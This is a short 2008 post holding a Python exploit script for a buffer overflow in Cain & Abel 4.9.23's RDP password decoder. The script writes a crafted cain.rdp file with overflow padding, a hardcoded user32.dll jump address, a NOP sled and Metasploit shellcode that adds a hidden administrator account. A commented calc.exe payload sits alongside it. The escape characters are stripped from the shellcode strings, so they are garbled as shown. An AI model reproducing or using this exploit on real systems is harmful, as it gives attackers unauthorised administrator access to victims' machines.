cainabel-overflow.txt
Posted on 04 December 2008
#exploit.py print "" print " !R4Q!4N H4CK3R" print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit" print "By:Encrypt3d.M!nd" print "encrypt3d.blogspot.com" print "######################################################" print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends" print "This is exploit for my PoC" print "Tested on:Windows Xp Sp3 Patched" print "This exploit will Create File(.rdp) and when decoding" print "The file with Cain(Remote Desktop Password Decoder)" print "Will Add administrator user(user) with password(pass)" print "" # win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232 Encoder=PexFnstenvSub http://metasploit.com shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13x46" shellcode+= "xcdx10x60x83xebxfcxe2xf4xbax25x54x60x46xcdx9bx25" shellcode+= "x7ax46x6cx65x3exccxffxebx09xd5x9bx3fx66xccxfbx29" shellcode+= "xcdxf9x9bx61xa8xfcxd0xf9xeax49xd0x14x41x0cxdax6d" shellcode+= "x47x0fxfbx94x7dx99x34x64x33x28x9bx3fx62xccxfbx06" shellcode+= "xcdxc1x5bxebx19xd1x11x8bxcdxd1x9bx61xadx44x4cx44" shellcode+= "x42x0ex21xa0x22x46x50x50xc3x0dx68x6cxcdx8dx1cxeb" shellcode+= "x36xd1xbdxebx2exc5xfbx69xcdx4dxa0x60x46xcdx9bx08" shellcode+= "x7ax92x21x96x26x9bx99x98xc5x0dx6bx30x2ex3dx9ax64" shellcode+= "x19xa5x88x9exccxc3x47x9fxa1xaex7dx04x68xa8x68x05" shellcode+= "x66xe2x73x40x28xa8x64x40x33xbex75x12x66xb8x63x05" shellcode+= "x34xedx60x01x35xbex30x4fx07x89x54x40x60xebx30x0e" shellcode+= "x23xb9x30x0cx29xaex71x0cx21xbfx7fx15x36xedx51x04" shellcode+= "x2bxa4x7ex09x35xb9x62x01x32xa2x62x13x66xb8x63x05" shellcode+= "x34xedx3fx21x02x89x10x60"; # and if you want to test it..this shellcode will open calc.exe #shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xb2" #shellcode+= "xabx63x3dx83xebxfcxe2xf4x4ex43x27x3dxb2xabxe8x78" #shellcode+= "x8ex20x1fx38xcaxaax8cxb6xfdxb3xe8x62x92xaax88x74" #shellcode+= "x39x9fxe8x3cx5cx9axa3xa4x1ex2fxa3x49xb5x6axa9x30" #shellcode+= "xb3x69x88xc9x89xffx47x39xc7x4exe8x62x96xaax88x5b" #shellcode+= "x39xa7x28xb6xedxb7x62xd6x39xb7xe8x3cx59x22x3fx19" #shellcode+= "xb6x68x52xfdxd6x20x23x0dx37x6bx1bx31x39xebx6fxb6" #shellcode+= "xc2xb7xcexb6xdaxa3x88x34x39x2bxd3x3dxb2xabxe8x55" #shellcode+= "x8exf4x52xcbxd2xfdxeaxc5x31x6bx18x6dxdax5bxe9x39" #shellcode+= "xedxc3xfbxc3x38xa5x34xc2x55xc8x02x51xd1x85x06x45" #shellcode+= "xd7xabx63x3d"; eip = "xB7x2Fx49x7E" #user32.dll jmp esp 0x7E492FB7 chars = "E"*8206 print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t" print "" file = open('cain.rdp','w') file.write (chars+eip+eip+"x90"*10+shellcode) file.close() print "D0NE!"
